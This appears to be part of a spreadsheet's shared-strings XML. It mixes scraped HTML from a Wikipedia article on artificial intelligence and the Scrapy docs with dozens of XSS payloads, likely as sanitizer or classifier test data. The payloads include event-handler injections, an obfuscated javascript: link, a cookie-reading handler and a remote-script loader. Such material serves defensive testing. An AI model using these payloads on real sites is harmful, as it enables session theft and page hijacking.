    <t>&lt;textarea onkeypress="alert(1)" contenteditable&gt;test&lt;/textarea&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li&gt;&lt;cite id="CITEREFAlbus2002" class="citation encyclopaedia"&gt;Albus, J. S. (2002). "4D/RCS: A reference model architecture for intelligent unmanned ground vehicles".  In Gerhart, G.; Gunderson, R.; Shoemaker, C. (eds.). &lt;a rel="nofollow" class="external text" href="https://web.archive.org/web/20040725051856/http://www.isd.mel.nist.gov/documents/albus/4DRCS.pdf"&gt;&lt;i&gt;4-D/RCS: A Reference Model Architecture for Intelligent Unmanned Ground Vehicles &lt;/i&gt; &lt;/a&gt; &lt;span class="cs1-format"&gt;(PDF) </t>
  </si>
  <si>
    <t>&lt;template onmouseout="alert(1)"&gt;test&lt;/template&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}&lt;/style&gt;&lt;area id=x style="position:absolute;" onanimationcancel="alert(1)"&gt;&lt;/area&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;Igor Aizenberg, Naum N. Aizenberg, Joos P.L. Vandewalle (2000). Multi-Valued and Universal Binary Neurons: Theory, Learning and Applications. Springer Science &amp;amp; Business Media. </t>
  </si>
  <si>
    <t>&lt;footer onmouseenter="alert(1)"&gt;test&lt;/footer&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Substance_dualism" class="mw-redirect" title="Substance dualism"&gt;Substance dualism &lt;/a&gt; &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFRussellNorvig2003"&gt;Russell &amp;amp; Norvig 2003 &lt;/a&gt;, pp.&amp;#160;22–23 &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;canvas onbeforecopy="alert(1)" contenteditable&gt;test&lt;/canvas&gt;</t>
  </si>
  <si>
    <t>&lt;rt onbeforepaste="alert(1)" contenteditable&gt;test&lt;/rt&gt;</t>
  </si>
  <si>
    <t>&lt;a href="/wiki/Computational_intelligence" title="Computational intelligence"&gt;Computational intelligence &lt;/a&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {transform: rotate(180deg);}&lt;/style&gt;&lt;code id=x style="transition:transform 2s" ontransitionrun=alert(1)&gt;&lt;/code&gt;</t>
  </si>
  <si>
    <t>&lt;a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&amp;#97v&amp;#97script:&amp;#97lert(1)&gt;ClickMe</t>
  </si>
  <si>
    <t>&lt;dd id=x tabindex=1 onfocus=alert(1)&gt;&lt;/dd&gt;</t>
  </si>
  <si>
    <t>&lt;b draggable="true" ondragstart="alert(1)"&gt;test&lt;/b&gt;</t>
  </si>
  <si>
    <t>document.documentURI</t>
  </si>
  <si>
    <t>Set.constructor`alert\x28document.domain\x29```</t>
  </si>
  <si>
    <t>&lt;nobr oncontextmenu="alert(1)"&gt;test&lt;/nobr&gt;</t>
  </si>
  <si>
    <t>&lt;center onpointerdown=alert(1)&gt;XSS&lt;/center&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {transform: rotate(180deg);}&lt;/style&gt;&lt;applet id=x style="transition:transform 2s" ontransitionrun=alert(1)&gt;&lt;/applet&gt;</t>
  </si>
  <si>
    <t>&lt;dt&gt;&lt;a class="reference internal" href="faq.html"&gt;&lt;span class="doc"&gt;Frequently Asked Questions</t>
  </si>
  <si>
    <t>SRC=# onmouseover="alert(document.cookie)</t>
  </si>
  <si>
    <t>&lt;command id=x tabindex=1 ondeactivate=alert(1)&gt;&lt;/command&gt;&lt;input id=y autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;applet onkeydown="alert(1)" contenteditable&gt;test&lt;/applet&gt;</t>
  </si>
  <si>
    <t>&lt;li class="toctree-l1"&gt;&lt;a class="reference internal" href="intro/overview.html"&gt;Scrapy at a glance&lt;/a&gt;&lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Psychoanalysis" title="Psychoanalysis"&gt;Psychoanalysis &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}&lt;/style&gt;&lt;details id=x style="position:absolute;" onanimationcancel="alert(1)"&gt;&lt;/details&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;acronym ondrop=alert(1) contenteditable&gt;drop here&lt;/acronym&gt;</t>
  </si>
  <si>
    <t>&lt;td onbeforecopy="alert(1)" contenteditable&gt;test&lt;/td&gt;</t>
  </si>
  <si>
    <t>&lt;param onbeforecopy="alert(1)" contenteditable&gt;test&lt;/param&gt;</t>
  </si>
  <si>
    <t>&lt;SCRIPT&gt;document.write("&lt;SCRI");&lt;/SCRIPT&gt;PT SRC="httx://.rocks/.js"&gt;&lt;/SCRIPT&gt;</t>
  </si>
  <si>
    <t>&lt;li class="toctree-l1"&gt;&lt;a class="reference internal" href="topics/asyncio.html"&gt;asyncio&lt;/a&gt;&lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-380"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-380"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;li class="toctree-l1"&gt;&lt;a class="reference internal" href="topics/signals.html"&gt;Signals&lt;/a&gt;&lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;table onkeyup="alert(1)" contenteditable&gt;test&lt;/table&gt;</t>
  </si>
  <si>
    <t>&lt;a draggable="true" ondragleave="alert(1)"&gt;test&lt;/a&gt;</t>
  </si>
  <si>
    <t>&lt;svg&gt;&lt;figcaption onload=alert(1)&gt;&lt;/figcaption&gt;</t>
  </si>
  <si>
    <t>&lt;nextid onmouseup="alert(1)"&gt;test&lt;/nextid&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color:red;}&lt;/style&gt;&lt;ruby id=x style="transition:color 1s" ontransitionend=alert(1)&gt;&lt;/ruby&gt;</t>
  </si>
  <si>
    <t>&lt;colgroup onpointerover=alert(1)&gt;XSS&lt;/colgroup&gt;</t>
  </si>
  <si>
    <t>&lt;p draggable="true" ondragleave="alert(1)"&gt;test&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;li class="toctree-l1"&gt;&lt;a class="reference internal" href="topics/dynamic-content.html"&gt;Selecting dynamically-loaded content&lt;/a&gt;&lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;meter draggable="true" ondragend="alert(1)"&gt;test&lt;/meter&gt;</t>
  </si>
  <si>
    <t>&lt;progress draggable="true" ondrag="alert(1)"&gt;test&lt;/progress&gt;</t>
  </si>
  <si>
    <t>&lt;dl class="docutils"&gt;</t>
  </si>
  <si>
    <t>&lt;xss id=x tabindex=1 ondeactivate=alert(1)&gt;&lt;/xss&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;rtc onmouseleave="alert(1)"&gt;test&lt;/rtc&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Glossary_of_artificial_intelligence" title="Glossary of artificial intelligence"&gt;Glossary of artificial intelligence &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation book"&gt;&lt;a rel="nofollow" class="external text" href="https://ec.europa.eu/info/sites/info/files/commission-white-paper-artificial-intelligence-feb2020_en.pdf"&gt;&lt;i&gt;White Paper: On Artificial Intelligence - A European approach to excellence and trust &lt;/i&gt; &lt;/a&gt; &lt;span class="cs1-format"&gt;(PDF) </t>
  </si>
  <si>
    <t>&lt;legend oncopy="alert(1)" contenteditable&gt;test&lt;/legend&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Epistemological_anarchism" title="Epistemological anarchism"&gt;Epistemological anarchism &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;nav id=x tabindex=1 onbeforedeactivate=alert(1)&gt;&lt;/nav&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;style onkeydown="alert(1)" contenteditable&gt;test&lt;/style&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;ruby style="animation-name:x" onanimationend="alert(1)"&gt;&lt;/ruby&gt;</t>
  </si>
  <si>
    <t>&lt;div role="note" class="hatnote navigation-not-searchable"&gt;Main articles: &lt;a href="/wiki/Hard_problem_of_consciousness" title="Hard problem of consciousness"&gt;Hard problem of consciousness &lt;/a&gt; and &lt;a href="/wiki/Theory_of_mind" title="Theory of mind"&gt;Theory of mind &lt;/a&gt; &lt;/div&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li&gt;&lt;cite id="CITEREFKoza1992" class="citation book"&gt;Koza, John R. (1992). &lt;i&gt;Genetic Programming (On the Programming of Computers by Means of Natural Selection) &lt;/i&gt;. MIT Press. &lt;a href="/wiki/Bibcode" title="Bibcode"&gt;Bibcode &lt;/a&gt;:&lt;a rel="nofollow" class="external text" href="https://ui.adsabs.harvard.edu/abs/1992gppc.book.....K"&gt;1992gppc.book.....K &lt;/a&gt;. &lt;a href="/wiki/International_Standard_Book_Number" title="International Standard Book Number"&gt;ISBN &lt;/a&gt;&amp;#160;&lt;a href="/wiki/Special:BookSources/978-0-262-11170-6" title="Special:BookSources/978-0-262-11170-6"&gt;&lt;bdi&gt;978-0-262-11170-6 &lt;/bdi&gt; &lt;/a&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook&amp;amp;rft.genre=book&amp;amp;rft.btitle=Genetic+Programming+%28On+the+Programming+of+Computers+by+Means+of+Natural+Selection%29&amp;amp;rft.pub=MIT+Press&amp;amp;rft.date=1992&amp;amp;rft_id=info%3Abibcode%2F1992gppc.book.....K&amp;amp;rft.isbn=978-0-262-11170-6&amp;amp;rft.aulast=Koza&amp;amp;rft.aufirst=John+R.&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Information_retrieval" title="Information retrieval"&gt;Information retrieval &lt;/a&gt; &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;dfn draggable="true" ondragenter="alert(1)"&gt;test&lt;/dfn&gt;</t>
  </si>
  <si>
    <t>&lt;script onbeforepaste="alert(1)" contenteditable&gt;test&lt;/script&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-300"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-300"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;div onpointermove=alert(1)&gt;XSS&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;menu oncontextmenu="alert(1)"&gt;test&lt;/menu&gt;</t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;/div&gt; &lt;/td&gt; &lt;/tr&gt;&lt;tr&gt;&lt;th scope="row" class="navbox-group" style="width:1%"&gt;&lt;a href="/wiki/Academic_journal" title="Academic journal"&gt;Journals &lt;/a&gt; &lt;/th&gt;&lt;td class="navbox-list navbox-even hlist" style="text-align:left;border-left-width:2px;border-left-style:solid;width:100%;padding:0px"&gt;</t>
  </si>
  <si>
    <t>"&lt;a href="/wiki/History_of_AI#The_golden_years_1956–1974" class="mw-redirect" title="History of AI"&gt;Golden years &lt;/a&gt;" of AI (successful symbolic reasoning programs 1956–1973):</t>
  </si>
  <si>
    <t>&lt;shadow onpointerdown=alert(1)&gt;XSS&lt;/shadow&gt;</t>
  </si>
  <si>
    <t>&lt;rt id=x tabindex=1 onbeforeactivate=alert(1)&gt;&lt;/rt&gt;</t>
  </si>
  <si>
    <t>&lt;main id=x tabindex=1 onbeforedeactivate=alert(1)&gt;&lt;/main&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;&lt;link rel="mw-deduplicated-inline-style" href="mw-data:TemplateStyles:r935243608"/&gt;. McCarthy recently reiterated his position at the &lt;a href="/wiki/AI@50" title="AI@50"&gt;AI@50 &lt;/a&gt; conference where he said "Artificial intelligence is not, by definition, simulation of human intelligence" (&lt;a href="#CITEREFMaker2006"&gt;Maker 2006 &lt;/a&gt;). &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;dt&gt;&lt;a class="reference internal" href="topics/coroutines.html"&gt;&lt;span class="doc"&gt;Coroutines</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;&lt;/a&gt;&lt;/dt&gt;&lt;dd&gt;Deploying your Scrapy spiders and run them in a remote server.&lt;/dd&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-84"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-84"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;/div&gt; &lt;/td&gt; &lt;/tr&gt;&lt;tr&gt;&lt;th scope="row" class="navbox-group" style="width:1%"&gt;Related topics &lt;/th&gt;&lt;td class="navbox-list navbox-odd hlist" style="text-align:left;border-left-width:2px;border-left-style:solid;width:100%;padding:0px"&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color: red;}&lt;/style&gt;&lt;tr id=x style="transition:color 10s" ontransitioncancel=alert(1)&gt;&lt;/tr&gt;</t>
  </si>
  <si>
    <t>&lt;ul draggable="true" ondragend="alert(1)"&gt;test&lt;/ul&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=unknown&amp;amp;rft.jtitle=IEEE+Spectrum%3A+Technology%2C+Engineering%2C+and+Science+News&amp;amp;rft.atitle=Full+Page+Reload&amp;amp;rft_id=https%3A%2F%2Fspectrum.ieee.org%2Fbiomedical%2Fdiagnostics%2Fhow-ibm-watson-overpromised-and-underdelivered-on-ai-health-care&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Stuart_J._Russell" title="Stuart J. Russell"&gt;Stuart J. Russell &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>document.URL</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;image ondragover=alert(1) contenteditable&gt;drop here&lt;/image&gt;</t>
  </si>
  <si>
    <t>&lt;command onclick="alert(1)"&gt;test&lt;/command&gt;</t>
  </si>
  <si>
    <t>&lt;img2 onpointermove=alert(1)&gt;XSS&lt;/img2&gt;</t>
  </si>
  <si>
    <t>&lt;bdo id=x tabindex=1 onfocus=alert(1)&gt;&lt;/bdo&gt;</t>
  </si>
  <si>
    <t>&lt;svg id=x tabindex=1 onactivate=alert(1)&gt;&lt;/svg&gt;</t>
  </si>
  <si>
    <t>&lt;datalist id=x tabindex=1 ondeactivate=alert(1)&gt;&lt;/datalist&gt;&lt;input id=y autofocus&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=unknown&amp;amp;rft.jtitle=NextBigWhat&amp;amp;rft.atitle=AI+traffic+signals+to+be+installed+in+Bengaluru+soon&amp;amp;rft.date=2019-09-24&amp;amp;rft_id=https%3A%2F%2Fnextbigwhat.com%2Fai-traffic-signals-to-be-installed-in-bengaluru-soon%2F&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>document.querySelector(".example")</t>
  </si>
  <si>
    <t>&lt;map onmouseleave="alert(1)"&gt;test&lt;/map&gt;</t>
  </si>
  <si>
    <t>&lt;strong draggable="true" ondragleave="alert(1)"&gt;test&lt;/strong&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;/h2&gt;</t>
  </si>
  <si>
    <t>&lt;rp draggable="true" ondragstart="alert(1)"&gt;test&lt;/rp&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;script ondrop=alert(1) contenteditable&gt;drop here&lt;/script&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="toctext"&gt;Cybernetics and brain simulation </t>
  </si>
  <si>
    <t>&lt;META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"&gt;</t>
  </si>
  <si>
    <t>&lt;tbody draggable="true" ondragleave="alert(1)"&gt;test&lt;/tbody&gt;</t>
  </si>
  <si>
    <t>&lt;big onpointerleave=alert(1)&gt;XSS&lt;/big&gt;</t>
  </si>
  <si>
    <t>&lt;details onpointerdown=alert(1)&gt;XSS&lt;/details&gt;</t>
  </si>
  <si>
    <t>&lt;dt&gt;&lt;a class="reference internal" href="intro/tutorial.html"&gt;&lt;span class="doc"&gt;Scrapy Tutorial</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;svg style="animation-name:x" onanimationstart="alert(1)"&gt;&lt;/svg&gt;</t>
  </si>
  <si>
    <t>&lt;plaintext onbeforecut="alert(1)" contenteditable&gt;test&lt;/plaintext&gt;</t>
  </si>
  <si>
    <t>&lt;small id=x tabindex=1 ondeactivate=alert(1)&gt;&lt;/small&gt;&lt;input id=y autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Intrusion_detection_system" title="Intrusion detection system"&gt;Intrusion detection system &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;noframes onpointerleave=alert(1)&gt;XSS&lt;/noframes&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;&lt;a href="/w/index.php?title=Artificial_intelligence&amp;amp;action=edit&amp;amp;section=57" title="Edit section: Artificial moral agents"&gt;edit &lt;/a&gt;&lt;span class="mw-editsection-bracket"&gt;] </t>
  </si>
  <si>
    <t>&lt;ruby onmousemove="alert(1)"&gt;test&lt;/ruby&gt;</t>
  </si>
  <si>
    <t>&lt;dt&gt;&lt;a class="reference internal" href="topics/shell.html"&gt;&lt;span class="doc"&gt;Scrapy shell</t>
  </si>
  <si>
    <t>&lt;li class="toctree-l1"&gt;&lt;a class="reference internal" href="topics/api.html"&gt;Core API&lt;/a&gt;&lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {transform: rotate(180deg);}&lt;/style&gt;&lt;dt id=x style="transition:transform 2s" ontransitionrun=alert(1)&gt;&lt;/dt&gt;</t>
  </si>
  <si>
    <t>&lt;ruby oncopy="alert(1)" contenteditable&gt;test&lt;/ruby&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;pre style="animation-name:x" onanimationstart="alert(1)"&gt;&lt;/pre&gt;</t>
  </si>
  <si>
    <t>&lt;input onpointerup=alert(1)&gt;XSS&lt;/input&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Humberto_Maturana" title="Humberto Maturana"&gt;Humberto Maturana &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;/div&gt; &lt;/td&gt; &lt;/tr&gt;&lt;tr&gt;&lt;th scope="row" class="navbox-group" style="width:7.5em"&gt;Early modern &lt;/th&gt;&lt;td class="navbox-list navbox-odd" style="text-align:left;border-left-width:2px;border-left-style:solid;padding:0px"&gt;</t>
  </si>
  <si>
    <t>&lt;meta id=x tabindex=1 ondeactivate=alert(1)&gt;&lt;/meta&gt;&lt;input id=y autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;span id=x tabindex=1 onbeforeactivate=alert(1)&gt;&lt;/span&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a class="mw-selflink selflink"&gt;Artificial intelligence &lt;/a&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color: red;}&lt;/style&gt;&lt;frameset id=x style="transition:color 10s" ontransitioncancel=alert(1)&gt;&lt;/frameset&gt;</t>
  </si>
  <si>
    <t>&lt;u ondblclick="alert(1)"&gt;test&lt;/u&gt;</t>
  </si>
  <si>
    <t>&lt;td onmouseover="alert(1)"&gt;test&lt;/td&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/History_of_evolutionary_thought" title="History of evolutionary thought"&gt;History of evolutionary thought &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;option onkeydown="alert(1)" contenteditable&gt;test&lt;/option&gt;</t>
  </si>
  <si>
    <t>&lt;li onblur=alert(1) tabindex=1 id=x&gt;&lt;/li&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;dl onkeydown="alert(1)" contenteditable&gt;test&lt;/dl&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color: red;}&lt;/style&gt;&lt;dir id=x style="transition:color 10s" ontransitioncancel=alert(1)&gt;&lt;/dir&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="/wiki/Hexapod_(robotics)" title="Hexapod (robotics)"&gt;Hexapod &lt;/a&gt; &lt;/li&gt; &lt;/ul&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; 2019 </t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Data_mining" title="Data mining"&gt;Data mining &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;&lt;/a&gt;&lt;/dt&gt;&lt;dd&gt;See all available signals and how to work with them.&lt;/dd&gt;</t>
  </si>
  <si>
    <t>&lt;canvas onmouseup="alert(1)"&gt;test&lt;/canvas&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;fieldset style="animation-name:x" onanimationstart="alert(1)"&gt;&lt;/fieldset&gt;</t>
  </si>
  <si>
    <t>&lt;b onmouseup="alert(1)"&gt;test&lt;/b&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation journal"&gt;Hernández-Orallo, José; Dowe, David L.; Hernández-Lloreda, M.Victoria (March 2014). "Universal psychometrics: Measuring cognitive abilities in the machine kingdom". &lt;i&gt;Cognitive Systems Research &lt;/i&gt;. &lt;b&gt;27 &lt;/b&gt;: 50–74. &lt;a href="/wiki/Digital_object_identifier" title="Digital object identifier"&gt;doi &lt;/a&gt;:&lt;a rel="nofollow" class="external text" href="https://doi.org/10.1016%2Fj.cogsys.2013.06.001"&gt;10.1016/j.cogsys.2013.06.001 &lt;/a&gt;. &lt;a href="/wiki/Handle_System" title="Handle System"&gt;hdl &lt;/a&gt;:&lt;a rel="nofollow" class="external text" href="//hdl.handle.net/10251%2F50244"&gt;10251/50244 &lt;/a&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=article&amp;amp;rft.jtitle=Cognitive+Systems+Research&amp;amp;rft.atitle=Universal+psychometrics%3A+Measuring+cognitive+abilities+in+the+machine+kingdom&amp;amp;rft.volume=27&amp;amp;rft.pages=50-74&amp;amp;rft.date=2014-03&amp;amp;rft_id=info%3Ahdl%2F10251%2F50244&amp;amp;rft_id=info%3Adoi%2F10.1016%2Fj.cogsys.2013.06.001&amp;amp;rft.aulast=Hern%C3%A1ndez-Orallo&amp;amp;rft.aufirst=Jos%C3%A9&amp;amp;rft.au=Dowe%2C+David+L.&amp;amp;rft.au=Hern%C3%A1ndez-Lloreda%2C+M.Victoria&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;rtc onmouseup="alert(1)"&gt;test&lt;/rtc&gt;</t>
  </si>
  <si>
    <t>&lt;object data="javascript:alert()"&gt;</t>
  </si>
  <si>
    <t xml:space="preserve"> 	&lt;sup id="cite_ref-Emotion_and_affective_computing_144-0" class="reference"&gt;&lt;a href="#cite_note-Emotion_and_affective_computing-144"&gt;&amp;#91;141&amp;#93; &lt;/a&gt; &lt;/sup&gt; Similarly, some &lt;a href="/wiki/Virtual_assistant" title="Virtual assistant"&gt;virtual assistants &lt;/a&gt; are programmed to speak conversationally or even to banter humorously; this tends to give naïve users an unrealistic conception of how intelligent existing computer agents actually are.&lt;sup id="cite_ref-145" class="reference"&gt;&lt;a href="#cite_note-145"&gt;&amp;#91;142&amp;#93; &lt;/a&gt; &lt;/sup&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 									0s 1 x;}&lt;/style&gt;&lt;a id=x style="position:absolute;" onanimationcancel="alert(1)"&gt;&lt;/a&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Application_security" title="Application security"&gt;Application security &lt;/a&gt; &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;template onkeydown="alert(1)" contenteditable&gt;test&lt;/template&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-Eleanor-315"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-Eleanor_315-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;marquee oncut="alert(1)" contenteditable&gt;test&lt;/marquee&gt;</t>
  </si>
  <si>
    <t>&lt;sub onmouseup="alert(1)"&gt;test&lt;/sub&gt;</t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;/div&gt; &lt;/td&gt; &lt;/tr&gt;&lt;tr&gt;&lt;th scope="row" class="navbox-group" style="width:1%"&gt;&lt;a href="/wiki/Robot_locomotion" title="Robot locomotion"&gt;Locomotion &lt;/a&gt; &lt;/th&gt;&lt;td class="navbox-list navbox-even" style="text-align:left;border-left-width:2px;border-left-style:solid;width:100%;padding:0px"&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation journal"&gt;Cadena, Cesar; Carlone, Luca; Carrillo, Henry; Latif, Yasir; Scaramuzza, Davide; Neira, Jose; Reid, Ian; Leonard, John J. (December 2016). "Past, Present, and Future of Simultaneous Localization and Mapping: Toward the Robust-Perception Age". &lt;i&gt;IEEE Transactions on Robotics &lt;/i&gt;. &lt;b&gt;32 &lt;/b&gt; (6): 1309–1332. &lt;a href="/wiki/ArXiv" title="ArXiv"&gt;arXiv &lt;/a&gt;:&lt;span class="cs1-lock-free" title="Freely accessible"&gt;&lt;a rel="nofollow" class="external text" href="//arxiv.org/abs/1606.05830"&gt;1606.05830 &lt;/a&gt; </t>
  </si>
  <si>
    <t>&lt;rb onmouseleave="alert(1)"&gt;test&lt;/rb&gt;</t>
  </si>
  <si>
    <t>&lt;noscript draggable="true" ondragstart="alert(1)"&gt;test&lt;/noscript&gt;</t>
  </si>
  <si>
    <t>&lt;tfoot onkeypress="alert(1)" contenteditable&gt;test&lt;/tfoot&gt;</t>
  </si>
  <si>
    <t>&lt;title ondblclick="alert(1)"&gt;test&lt;/title&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;a href="/wiki/Rina_Dechter" title="Rina Dechter"&gt;Rina Dechter &lt;/a&gt; (1986). Learning while searching in constraint-satisfaction problems. University of California, Computer Science Department, Cognitive Systems Laboratory.&lt;a rel="nofollow" class="external text" href="https://www.researchgate.net/publication/221605378_Learning_While_Searching_in_Constraint-Satisfaction-Problems"&gt;Online &lt;/a&gt; &lt;a rel="nofollow" class="external text" href="https://web.archive.org/web/20160419054654/https://www.researchgate.net/publication/221605378_Learning_While_Searching_in_Constraint-Satisfaction-Problems"&gt;Archived &lt;/a&gt; 19 April 2016 at the &lt;a href="/wiki/Wayback_Machine" title="Wayback Machine"&gt;Wayback Machine &lt;/a&gt; </t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;&lt;a href="/w/index.php?title=Artificial_intelligence&amp;amp;action=edit&amp;amp;section=15" title="Edit section: Cybernetics and brain simulation"&gt;edit &lt;/a&gt;</t>
  </si>
  <si>
    <t>&lt;param onkeypress="alert(1)" contenteditable&gt;test&lt;/param&gt;</t>
  </si>
  <si>
    <t>&lt;xss id=x tabindex=1 onbeforeactivate=alert(1)&gt;&lt;/xss&gt;</t>
  </si>
  <si>
